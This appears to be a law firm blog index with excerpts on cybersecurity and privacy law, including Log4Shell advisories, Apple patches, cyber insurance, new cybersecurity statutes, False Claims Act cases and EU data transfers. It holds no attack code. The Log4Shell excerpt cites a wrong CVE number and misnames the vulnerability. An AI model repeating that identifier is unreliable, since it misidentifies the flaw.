The Privacy Hacks

Requirements of Cybersecurity Expert Testimony in the Third Circuit


Takeaway: In many data breach cases, a cybersecurity expert may evaluate whether the company’s security measures were reasonable and appropriate or, alternatively, if the company lacked the requisite technology to detect a breach. In some circumstances, however, a party’s proposed expert may be challenged on the basis of unfair prejudice. Yet, under the Third Circuit’s “generally liberal standard of qualifying experts”, such a challenge was recently overcome by a party whose expert had advanced IT credentials, 20+ years of relevant professional experience, and offered an opinion with probative evidentiary value that outweighed any danger of unfair prejudice. Key Points: Rule 702 of the Federal Rules of Evidence sets forth the standards for admissible expert testimony. As explained by the Third Circuit Court of Appeals: “Rule 702 has three major requirements: (1) the proffered witness must be an expert, i.e., must be qualified; (2) the expert must testify about matters requiring scientific, technical or specialized knowledge [, i.e., reliability]; and (3) the expert’s testimony must assist the trier of fact [, i.e., fit].”[1] Regarding the first requirement, qualification, the Third Circuit has stated that it has “a generally liberal standard of qualifying experts.”[2] “Rule 702 requires the witness to have ‘specialized knowledge’ regarding the area of testimony. The basis of this specialized knowledge can be practical experience as well as academic training and credentials.”[3] When addressing the second requirement, reliability, the Third Circuit has derived from the seminal case of Daubert the following non-exclusive factors for determining reliability: “(1) whether a method consists of a testable hypothesis; (2) whether the method has been subject to peer review; (3) the known or potential rate of error; (4) the existence and maintenance of standards controlling the technique’s operation; (5) whether the method is generally accepted; (6) the relationship of the technique to methods which have been established to be reliable; (7) the qualifications of the expert witness testifying based on the methodology; and (8) the non-judicial uses to which the method has been put.”[4] Read More

Bad Actors Continue to Exploit Log4Shell Vulnerabilities


Takeaway: CISA and CGYBER recommend all organizations who did not immediately apply available patches to assume Log4Shell compromise and initiate threat hunting activities. In December 2021, the world was held hostage by hackers who found certain vulnerabilities in Log4Shell and exploited them. As part of this exploitation, suspected and advanced threat actors implanted loader malware on compromised systems with embedded directives enabling remote command and control. A confirmed compromise showed that these actors were able to infiltrate a disaster recovery network and collect sensitive data. Cybersecurity agencies and governmental policy bodies acted immediately against these threats and released patches and Malware Analysis Reports MAR-10382580-1 and MAR-10382254-1 detailing hack workarounds. But the threat was omnipresent. The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGYBER) recently released a warning in July to network defenders that cyber threat actors continue to exploit CVE-2021-4423 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to infiltrate organizations that failed to apply patches. Organizations are encouraged to read MAR-10382254-1 which provides examples of malware samples including indicators of comprise (IOCs) and detection signatures. What organizations must do now is: Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, organizations must treat all affected VMware systems as compromised. Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services. For the full article and specific examples of Log4Shell threat events, go to: * This blog is available for informational purposes only and is not considered legal advice on any subject matter. By viewing blog posts, the reader understands there is no attorney-client relationship between the reader and the blog publisher. Read More

Decoding the Recent Apple Security Updates


Takeaway: The recent vulnerabilities in Apple software has exemplified the importance of patch management and keeping devices up to date with the latest operating systems and software in order to protect the security of devices. The recent data breach reported by Apple, Inc. (“Apple”) has once again brought global attention to privacy threats caused by security flaws and vulnerabilities.[1] On Wednesday, August 17, 2022 Apple released two emergency updates in response to zero day threat, or an attack that targets a previously unknown security vulnerability. The updates affected the following products: “iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)” as well as Safari and Mac computers running macOS Monterey.[2] Given that there are over 1.5 billion active Apple products in use worldwide, the vulnerability had potentially significant reach.[3] The vulnerabilities have the following CVE-IDs: CVE-2022-32893 and CVE-2022-32894.  The aim of the Common Vulnerabilities and Exposures (CVE) program is to “identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.”[4] Publishing consistent descriptions of security vulnerabilities allows organizations around the world to coordinate their efforts to prioritize and respond to the vulnerabilities, which maintains the integrity of devices and systems.[5] CVE is sponsored by the U.S. Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA). Apple described the security updates as an “out-of-bounds write issue was addressed with improved bounds checking.”[6] This means that the attacker could write data before the beginning or after the end of the intended buffer which can cause a crash, corruption of data, or code execution.[7] The issue was addressed by procedures meant to catch errors and protect the integrity of operations by ensuring that certain variables are within the bounds of an array before use. Read More

What Practices Should a Small Vendor Consider When Applying for Cyber Insurance


Takeaway: As cybersecurity risk increases, large enterprises and government agencies are, increasingly, forcing smaller vendor companies to obtain cyber insurance to help manage the risk of a data breach. To prepare for an annual cybersecurity insurance renewal or initial application, consider the following practices which could help address the risks most concerning to an insurer. Although cybersecurity risk is a persistent concern for law makers and regulators, a national regulatory standard in the United States does not appear imminent. If, however, your company has applied for cybersecurity insurance recently, the application process may have seemed like a compliance audit. Cybersecurity insurance questionnaires, as complex as they have become, are usually inquiring about common practices that most businesses should feel confident investing in and implementing. For the most part, the cybersecurity practices desired by insurance underwriters – in the ever-changing world of cyber risk management – are the same, or similar in nature, to the administrative and technical safeguards required under various State and federal security standards. To prepare for an annual cybersecurity insurance renewal or initial application, consider the following practices which could help address the risks most concerning to an insurer and, perhaps even, reduce the insurance premium. Implement Written Information Security Policy (WISP) and Incident Response Plan (IRP) – The objective of a WISP is to guide the implementation of the proper technical, administrative, and physical safeguards needed to protect an organization’s data. An IRP helps reduce the impact of a breach by creating a structured and systematic plan of response in the event of an incident affecting an organization’s systems, network, or data, including any data held by outside vendors or service providers. The IRP will also govern contingency plans like encrypted backups of your IT system and data. Password Management and Multi-Factor Authentication (MFA) – Anyone accessing a system, network or data should be asked to provide multiple methods of validating their identity. Read More

Governor Wolf Signs Bill to Aid Pennsylvania State and Local Government in Fighting Cybercrime


Takeaway: Governor Wolf signed a bill that authorizes the governor to order the Pennsylvania National Guard to assist local governments and private entities with cybersecurity support, training, and more. On July 7, 2022, Governor Wolf approved House Bill 2412, which authorizes the governor additional powers under Title 51 to order the Pennsylvania National Guard to support State and Local government entities with cybersecurity support, training, exercises, and more. [1] This legislation permits the governor to “to mobilize our experts through a special state duty status to protect our vital systems and securing personal information.” [2] The two military cybersecurity teams in Pennsylvania primarily subjected to the governor’s orders under this bill are the PA Army National Guard Defense Cyber Operations and the PA Air National Guard 112th Cyberspace Operations Squadron. [3] Trained military cybersecurity experts can now support local governments and non-government critical infrastructure entities after those entities submit requests for assistance. [4] State and Local governments and designated critical infrastructure can receive operational cybersecurity support. Private and educational institutes can receive training and exercises from the Guard. During a House Veterans Affairs & Emergency Preparedness Committee meeting in April, a sponsor of this Bill and the Cybersecurity Caucus Chair, state Rep. Craig Williams, R-Delaware, said that “We don’t know how many times we’ve been intruded in the cyber space.” [5] Further, Rep. Williams stated, “[Malware] is the leading front of asymmetrical warfare … Part of the effort by Rep. Gaydos and I is to raise awareness about this and try to get some lateral coordination and communication going.” [6] This new legislation will be particularly beneficial to smaller Pennsylvania local governments without the resources to combat cybercrime independently. With the assistance of the PA National Guard, these government entities can receive actual aid in battling cybercrime and the training necessary to thwart future attacks through educational programs provided by military professionals. Read More

Contractors Beware – Cybersecurity Litigation on the Rise Under the False Claims Act


Takeaway: The DOJ’s Cyber Fraud Initiative and qui tam actions under the False Claims Act represent signification enforcement mechanisms for cybersecurity contractor compliance. On the eve of 2022, the United States began imposing new, punitive cybersecurity measures aimed at making the internet a safer platform for businesses to share and use data. As a direct result, cybersecurity contractors working in the defense industrial base are being targeted by the Department of Justice, resulting in a rapid increase of settlements under the False Claims Act. Just a few weeks ago, the Department of Defense issued a memorandum reminding contracting officers about their remedies against contractors that fail to implement NIST 800-171 cybersecurity controls. NIST 800-171 is a self-administered cybersecurity requirement for all DoD contractors. The DoD memorandum urges contracting officers to use available remedies, withholding progress payments, foregoing remaining contract options, and potentially terminating the contract in part or in whole.[1] The following cases serve as cautionary tales to cybersecurity contractors: If a cybersecurity contractor knowingly fails to comply with material cybersecurity requirements, the contractor could be exposed to liability via qui tam actions under the False Claims Act.[2] The recent Aerojet Rocketdyne settlement is foretelling.[3] Aerojet’s Senior Director for Cybersecurity filed the Aerojet action in April as a whistleblower under the False Claims Act. The action alleged that Aerojet fraudulently induced the government to contract with the aerospace company by not fully disclosing its non-compliance with DoD cybersecurity requirements. The action sought $19 billion in damages. The evidence showed that Aerojet communicated with the government about its non-compliance as it had sought a waiver of certain requirements. The presiding court, however, found “a genuine dispute of material fact [] as to the sufficiency of the disclosures” and thus denied Aerojet’s motion for summary judgment. The court found, upon a deeper investigation, that Aerojet failed to disclose pertinent information about cyber audits conducted by external firms, as well as past security breaches. Read More

Hacking Your Health: Can Your Electronic Health Record be Hacked?


Takeaway: With ransomware attacks increasing over the past few years, healthcare organizations can expect hackers to make ransom demands while holding their computer systems hostage. Everything comes back in style. In the 90s, computer hackers learned how to infiltrate networks, hold them hostage, and demand payment to make them functional again.  Recently, this strategy has resurged in the healthcare industry, potentially placing people’s lives at risk. From 2021 to 2022, the number of ransomware attacks on healthcare organizations skyrocketed by 94%. This resulted in two-thirds of healthcare organizations in the U.S. experiencing some form of a ransomware attack in 2021, up from 34% in 2020. According to cybersecurity experts, ransomware attacks on healthcare organizations were always common. But it is the increase in frequency and severity of these attacks now that is worrisome. These attacks can have devastating consequences.  Most recently in San Diego, California, treatments at a chemotherapy facility were delayed and, at another healthcare facility, ambulances were diverted from the emergency room after computer systems were frozen by an attack. In 2021, the first lawsuit alleging “death by ransomware” occurred where a mom sued a hospital for fatal brain damage to her newborn after heart rate monitors failed because of an attack. Healthcare facilities are high-profile targets because attackers know the facilities are willing to pay high ransoms to safeguard people’s lives. In fact, 61% of healthcare organizations paid attackers ransom to resolve a ransomware attack in 2021. Most of these attacks are carried out by private criminal groups. Conti, a crime syndicate out of Russia, was traced back to 30% of ransomware attacks in 2021. And just two weeks ago, the FBI revealed in June that it successfully thwarted an attack from Iran on a children’s hospital in Boston. As this unsophisticated tactic of the recent past resurfaces, organizations that utilize or transmit private health information must ensure that they are prepared. Read More

Italy Becomes Latest Country to Pass Sunshine Act


Takeaway: Although the enactment of the Italian Sunshine Act furthers the global expansion of healthcare transparency, the implied consent provision may not comply with the GDPR. I. Overview and Requirements of the New Italian Sunshine Act Law n. 62 of May 31, 2022[1], or the Italian Sunshine Act, took effect on June 26, 2022. This law requires transparency of “relationships, having economic relevance or advantage, between companies producing drugs, tools, equipment, goods and services, including non-medical ones, and the subjects who operate in the health sector or health care organizations” for the first time in Italy. The Sunshine Act advances the right to knowledge of economic relationships in the healthcare sector by broadly defining its reach. Article 1 notes that the law is aimed to promote transparency as well as prevent and fight corruption. Article 5 establishes an online public registrar that will become active through the Ministry of Health within six months of the date of entry into force of law. Data will be reported and published bi-annually and will remain publicly available for five years. The Minister of Health will consult with the Agency for Digital Italy, the National Anti-Corruption Authority, and the Italian Data Protection Authority within three months from the date of entry of the law to determine the best technical characteristics of the electronic public registrar and the requirements for transmission of data. The Italian Sunshine Act requires disclosure of three types of financial arrangements described in Articles 3 and 4. First, agreements or disbursements of money, goods, services, or other benefits between a manufacturing company and (a) a subject operating in the health sector, when they have a value unit greater than 100 euros or a total annual value amount greater than 1,000 euros, or (b) a health organization, when they have a value unit greater than € 1,000 or a total annual value amount greater than 2,500 euros must be reported every semester. Read More

Trans-Atlantic Data Privacy Framework: New Data-Sharing Vehicle Is Promising


On March 15, the United States and the European Commission (EU) entered into negotiations to create the Trans-Atlantic Data Privacy Framework (Framework). This effort is the third of its kind showcasing the legal complexity involved in creating a mechanism that fosters secure data flows between the United States and European Union, and provides redress for EU individuals who are targeted by U.S. government surveillance activities. The Framework promises a vehicle through which companies can share data in ways they couldn’t before thereby expanding global business. If the Framework operates as promised and intended, a data flow-reliant market worth $7.1 trillion could be supported and encouraged. Procedural Background Under the General Data Protection Regulation (GDPR), personal data is prohibited from being transferred from the European Economic Area (EEA) to countries outside the EEA. The European Commission has the authority to determine what countries have an adequate level of privacy protection. This analysis takes into consideration whether the country being evaluated has data controllers or processors that compensate for the lack of data protection by way of appropriate procedural safeguards. Between the United States and the EU, there have been two previous data-sharing mechanisms designed to provide a relatively easy “self-certification” method for U.S. companies to satisfy the safeguard requirement, each of which has been invalidated by the Court of Justice of the European Union (CJEU). In October 2015, the CJEU determined that the first mechanism, the Safe Harbor Privacy Principles (Safe Harbor), was invalid in Schrems v. Data Protection Commissioner, Case C362/14, Schrems v. Data Protection Commissioner, 2015 EU:C:2015:650 (Oct. 6, 2015) [hereinafter Schrems I]. In Schrems I, the CJEU found that the Safe Harbor failed to adequately protect the privacy of EU citizens because of the U.S. government’s ability to access personal data for national security purposes. In response to this determination, the United States and EU developed the new EU-U.S. Read More

President Biden Signs Two Cybersecurity Bills into Law


Takeaway: President Biden recently signed into law the “Federal Rotation Cyber Workforce Program Act” and the “State and Local Government Cybersecurity Act”. With these new laws, the Biden Administration is attempting to build a more robust cybersecurity workforce and aid local governments in combating cybercrime. On June 21, 2022, President Biden signed two bills to combat the war on cybercrime. The two bills are the “Federal Rotation Cyber Workforce Program Act” and the “State and Local Government Cybersecurity Act.”[1] The Federal Rotation Cyber Workforce Program Act creates a rotating program for cybersecurity and information technology professionals to have the opportunity to work in various federal agencies to sharpen their expertise. The Senate passed this bill in 2019, but the House only voted on it this year. [2] The State and Local Government Cybersecurity Act looks to improve the coordination between the Department of Homeland Security and local governments when battling cybercrime. [3]. This bill requires the National Cybercrime and Communications Integration Center (NCCIC) to share with states its security tools and protocols for dealing with cybercriminals. Representative Joe Neguse (D-CO), who introduced this bill, stated: “For hackers, state and local governments are an attractive target — we must increase support to these entities so that they can strengthen their systems and better defend themselves from harmful cyber-attacks.”[4] Local governments are in need of help from federal agencies because of the sophistication of modern cyber-attacks. These recently passed bills will aid in creating a more extensive network of well-informed cybercrime fighters and agencies. [1] S. 1097: Federal Rotational Cyber Workforce Program Act of 2021; S. 2520, the “State and Local Government Cybersecurity Act of 2021. [2] Madeline Lauver, US passes bills to foreground national security, Security Magazine, June 23, 2022, [3] Zach Schonfeld, Biden Signs cyber bills into law, THE HILL, June 6, 2022, 3:35 pm EDT, Read More

News & Events

Related News

Pietragallo Adds Cybersecurity Lawyer Martin T. Shepherd
October 7, 2021
Martin T. Shepherd, a well-known and respected litigation lawyer, has joined Pietragallo Gordon Alfano Bosick & Raspanti, LLP in the firm’s Commercial Litigation team and as head of the firm’s Diversity Initiative. Read More
View More News & Events